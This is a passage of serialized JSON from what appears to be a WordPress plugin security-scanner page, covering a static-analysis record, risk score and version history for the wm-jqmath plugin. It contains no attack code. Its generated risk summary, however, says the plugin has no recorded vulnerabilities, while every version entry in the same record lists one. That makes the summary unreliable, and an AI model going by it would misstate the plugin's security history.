remove all those unused tags in wp_head.\u003C\u002Fp>\n\u003Ch4>Usage\u003C\u002Fh4>\n\u003Col>\n\u003Cli>Go to ‘Clean up wp_head’ under ‘Settings’ menu\u003C\u002Fli>\n\u003Cli>Change the options of your choice\u003C\u002Fli>\n\u003C\u002Fol>\n\u003Cp>Follow the development of this plugin at \u003Ca href=\"http:\u002F\u002Ffredrikmalmgren.com\u002Fwordpress\u002Fplugins\u002Fclean-up-wp-head\u002F\" title=\"Clean up wp_head - Fredrik Malmgren\" rel=\"nofollow ugc\">FredrikMalmgren.com\u003C\u002Fa>.\u003C\u002Fp>\n","Use Clean up wp_head to remove unused tags in wp_head.",6494,"2012-11-05T22:03:00.000Z","3.4.2",[158,159,160,161,162],"rsd","start_post_rel","wlwmanifest","wp_generator","wp_head","http:\u002F\u002Ffredrikmalmgren.com\u002Fwordpress\u002Fplugins\u002Fclean-up-wp-head\u002F","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fclean-up-wp-head.0.2.1.zip",{"attackSurface":166,"codeSignals":181,"taintFlows":188,"riskAssessment":189,"analyzedAt":197},{"hooks":167,"ajaxHandlers":168,"restRoutes":169,"shortcodes":170,"cronEvents":179,"entryPointCount":180,"unprotectedCount":84},[],[],[],[171,176],{"tag":172,"callback":173,"file":174,"line":175},"enable_jqmath","enable_jqMath","wm_jqmath.php",38,{"tag":20,"callback":177,"file":174,"line":178},"generate_jqMathFormula",39,[],2,{"dangerousFunctions":182,"sqlUsage":183,"outputEscaping":185,"fileOperations":84,"externalRequests":84,"nonceChecks":84,"capabilityChecks":84,"bundledLibraries":187},[],{"prepared":84,"raw":84,"locations":184},[],{"escaped":84,"rawEcho":84,"locations":186},[],[],[],{"summary":190,"deductions":191},"The wm-jqmath plugin v1.3 exhibits a strong security posture based on the provided static analysis and vulnerability history. The code appears to follow best practices by not utilizing dangerous functions, all SQL queries are prepared, and all outputs are properly escaped. The absence of file operations and external HTTP requests further reduces the attack surface. Notably, there are no recorded vulnerabilities (CVEs) for this plugin, indicating a history of stable and secure development or a lack of prior discovery. The limited attack surface, consisting solely of two shortcodes, is also a positive sign.  However, the complete absence of nonce checks and capability checks on these shortcodes represents a potential oversight. While no vulnerabilities are immediately apparent from the static analysis due to the lack of complex flows, an attacker could potentially exploit these entry points if they were to lead to any sensitive operations or unintended behavior that isn't properly secured.",[192,195],{"reason":193,"points":194},"Shortcodes lack nonce checks",5,{"reason":196,"points":194},"Shortcodes lack capability checks","2026-03-16T23:04:32.074Z",{"wat":199,"direct":208},{"assetPaths":200,"generatorPatterns":203,"scriptPaths":204,"versionParams":205},[201,202],"\u002Fwp-content\u002Fplugins\u002Fwm-jqmath\u002Fcss\u002Fjqmath-0.4.3.css","\u002Fwp-content\u002Fplugins\u002Fwm-jqmath\u002Fjs\u002Fjqmath-etc-0.4.3.min.js",[],[202],[206,207],"wm-jqmath\u002Fcss\u002Fjqmath-0.4.3.css?ver=","wm-jqmath\u002Fjs\u002Fjqmath-etc-0.4.3.min.js?ver=",{"cssClasses":209,"htmlComments":210,"htmlAttributes":211,"restEndpoints":213,"jsGlobals":214,"shortcodeOutput":215},[],[],[212],"style",[],[],[216],"\u003Cspan",{"slug":4,"current_version":6,"total_versions":218,"versions":219},4,[220,227,235,243],{"version":6,"download_url":24,"svn_tag_url":221,"released_at":34,"has_diff":45,"diff_files_changed":222,"diff_lines":34,"trac_diff_url":223,"vulnerabilities":224,"is_current":226},"https:\u002F\u002Fplugins.svn.wordpress.org\u002Fwm-jqmath\u002Ftags\u002F1.3\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fwm-jqmath%2Ftags%2F1.2&new_path=%2Fwm-jqmath%2Ftags%2F1.3",[225],{"id":30,"url_slug":31,"title":32,"severity":36,"cvss_score":37,"vuln_type":39,"patched_in_version":34},true,{"version":228,"download_url":229,"svn_tag_url":230,"released_at":34,"has_diff":45,"diff_files_changed":231,"diff_lines":34,"trac_diff_url":232,"vulnerabilities":233,"is_current":45},"1.2","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwm-jqmath.1.2.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fwm-jqmath\u002Ftags\u002F1.2\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fwm-jqmath%2Ftags%2F1.1&new_path=%2Fwm-jqmath%2Ftags%2F1.2",[234],{"id":30,"url_slug":31,"title":32,"severity":36,"cvss_score":37,"vuln_type":39,"patched_in_version":34},{"version":236,"download_url":237,"svn_tag_url":238,"released_at":34,"has_diff":45,"diff_files_changed":239,"diff_lines":34,"trac_diff_url":240,"vulnerabilities":241,"is_current":45},"1.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwm-jqmath.1.1.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fwm-jqmath\u002Ftags\u002F1.1\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fwm-jqmath%2Ftags%2F1.0&new_path=%2Fwm-jqmath%2Ftags%2F1.1",[242],{"id":30,"url_slug":31,"title":32,"severity":36,"cvss_score":37,"vuln_type":39,"patched_in_version":34},{"version":89,"download_url":244,"svn_tag_url":245,"released_at":34,"has_diff":45,"diff_files_changed":246,"diff_lines":34,"trac_diff_url":34,"vulnerabilities":247,"is_current":45},"https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwm-jqmath.1.0.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fwm-jqmath\u002Ftags\u002F1.0\u002F",[],[248],{"id":30,"url_slug":31,"title":32,"severity":36,"cvss_score":37,"vuln_type":39,"patched_in_version":34}]